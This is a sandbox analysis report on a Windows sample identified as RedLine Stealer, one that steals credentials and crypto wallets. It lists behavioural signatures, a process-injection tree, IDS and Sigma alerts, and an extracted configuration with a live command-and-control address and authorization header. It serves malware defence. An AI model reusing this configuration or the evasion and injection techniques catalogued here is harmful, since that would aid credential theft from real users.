Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1568551
MD5:031377e4e34dcd19917fac02ff6da79f
SHA1:0fcccffee83cbb77a87ca1b55abc8e18fb267afc
SHA256:d58061a43df6b63e97421904c066ed5ad4b87a3733c250e105e83bc7154d9414
Tags:exex64user-jstrosch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected RedLine Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 031377E4E34DCD19917FAC02FF6DA79F)
    • audiodg.exe (PID: 7020 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
    • svchost.exe (PID: 7040 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • 7D3ED97FB83B796922796.exe (PID: 7120 cmdline: "C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe" MD5: 031377E4E34DCD19917FAC02FF6DA79F)
          • svchost.exe (PID: 6976 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 6996 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 6992 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
        • 4A64.tmp.x.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe" MD5: 97EB7BAA28471EC31E5373FCD7B8C880)
        • 7D3ED97FB83B796922796.exe (PID: 5608 cmdline: "C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe" MD5: 031377E4E34DCD19917FAC02FF6DA79F)
          • audiodg.exe (PID: 1272 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • svchost.exe (PID: 744 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • msiexec.exe (PID: 1068 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
        • 7405.tmp.zx.exe (PID: 2652 cmdline: "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe" MD5: D9AE4AB7E356E38950359025308C78F9)
          • 7405.tmp.zx.exe (PID: 5968 cmdline: "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe" MD5: D9AE4AB7E356E38950359025308C78F9)
    • msiexec.exe (PID: 7076 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["176.111.174.140:1912"], "Bot Id": "Diamotrix", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000004.00000003.1943024821.000000000AB61000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000002.00000002.3071197547.000001301D095000.00000004.00000020.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
          • 0x3b49d:$s2: ReflectiveLoader@
          00000004.00000000.1853448227.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
          • 0x3cc9d:$s2: ReflectiveLoader@
          00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
          • 0x3b49d:$s2: ReflectiveLoader@
          00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
          • 0x3b49d:$s2: ReflectiveLoader@
          Click to see the 13 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.explorer.exe.a020000.0.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
          • 0x39c9d:$s2: ReflectiveLoader@
          4.2.explorer.exe.c350000.1.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
          • 0x3b49d:$s2: ReflectiveLoader@
          4.0.explorer.exe.a020000.0.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
          • 0x3b49d:$s2: ReflectiveLoader@
          4.2.explorer.exe.cb95950.2.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
          • 0x3b49d:$s2: ReflectiveLoader@
          4.2.explorer.exe.e8f0000.4.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
          • 0x3cc9d:$s2: ReflectiveLoader@
          Click to see the 24 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services
          Sigma detected: Msiexec Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 176.111.174.140, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 7076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732
          Sigma detected: Remote Thread Creation By Uncommon Source Image
          Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\msiexec.exe, SourceProcessId: 7076, StartAddress: E8B94E0, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 2580
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6924, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7040, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6924, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7040, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-04T18:23:33.943195+010020432341A Network Trojan was detected176.111.174.1401912192.168.2.449739TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-04T18:23:33.497686+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:39.084599+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:40.260775+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:40.779753+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:41.352510+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:42.714618+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:43.315958+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:43.762749+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:44.239986+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:44.695801+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:45.139604+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:45.581368+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:46.027282+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:46.737885+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:47.358470+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:47.878248+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:48.424743+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:48.546697+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:49.942027+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:50.408112+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:51.330248+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:51.899066+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:52.342284+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          2024-12-04T18:23:52.848522+010020432311A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-04T18:23:39.543001+010020460561A Network Trojan was detected176.111.174.1401912192.168.2.449739TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-04T18:23:29.999764+010020185811A Network Trojan was detected192.168.2.449737176.111.174.14080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-04T18:23:29.999764+010020197142Potentially Bad Traffic192.168.2.449737176.111.174.14080TCP
          2024-12-04T18:23:32.571148+010020197142Potentially Bad Traffic192.168.2.449738176.111.174.14080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-04T18:23:33.497686+010020460451A Network Trojan was detected192.168.2.449739176.111.174.1401912TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-04T18:23:19.906803+010028032702Potentially Bad Traffic192.168.2.449730176.111.174.14080TCP
          2024-12-04T18:23:20.127484+010028032702Potentially Bad Traffic192.168.2.449731176.111.174.14080TCP
          2024-12-04T18:23:20.176071+010028032702Potentially Bad Traffic192.168.2.449732176.111.174.14080TCP
          2024-12-04T18:23:22.620068+010028032702Potentially Bad Traffic192.168.2.449733176.111.174.14080TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 9.0.4A64.tmp.x.exe.a90000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["176.111.174.140:1912"], "Bot Id": "Diamotrix", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeReversingLabs: Detection: 73%
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeReversingLabs: Detection: 63%
          Multi AV Scanner detection for submitted file
          Source: file.exeReversingLabs: Detection: 63%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064520856.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064896907.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.17.dr
          Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061121081.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.17.dr
          Source: Binary string: ucrtbase.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmp, ucrtbase.dll.17.dr
          Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062000144.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060653755.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.17.dr
          Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063366831.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064195340.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065057061.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: el.pdb..*_7y source: 4A64.tmp.x.exe, 00000009.00000002.2181113512.0000000006248000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2077350907.00007FFE13321000.00000002.00000001.01000000.0000000D.sdmp, _ctypes.pyd.17.dr
          Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061481679.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063629133.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063097579.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.17.dr
          Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064066874.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060774088.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.17.dr
          Source: Binary string: vcruntime140.amd64.pdbGCTL source: 7405.tmp.zx.exe, 00000011.00000003.2059081249.000001BBE518F000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2077486509.00007FFE1333E000.00000002.00000001.01000000.0000000C.sdmp
          Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062380579.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060399599.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060993419.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063927305.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, select.pyd.17.dr
          Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062650438.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.17.dr
          Source: Binary string: ucrtbase.pdbUGP source: 7405.tmp.zx.exe, 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmp, ucrtbase.dll.17.dr
          Source: Binary string: vcruntime140.amd64.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059081249.000001BBE518F000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2077486509.00007FFE1333E000.00000002.00000001.01000000.0000000C.sdmp
          Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065357794.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061370875.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.17.dr
          Source: Binary string: el.pdb source: 4A64.tmp.x.exe, 00000009.00000002.2181113512.0000000006248000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063235629.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.17.dr
          Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062246272.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060529722.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.17.dr
          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.17.dr
          Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063763840.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.17.dr
          Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2076606633.00007FFDFB05D000.00000002.00000001.01000000.0000000B.sdmp
          Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061860819.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064634549.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062506692.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062119686.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065508474.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062783484.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063492265.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.17.dr
          Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.17.dr
          Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062952516.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061257377.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.17.dr
          Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064769321.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061739114.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.17.dr
          Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061629125.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.17.dr
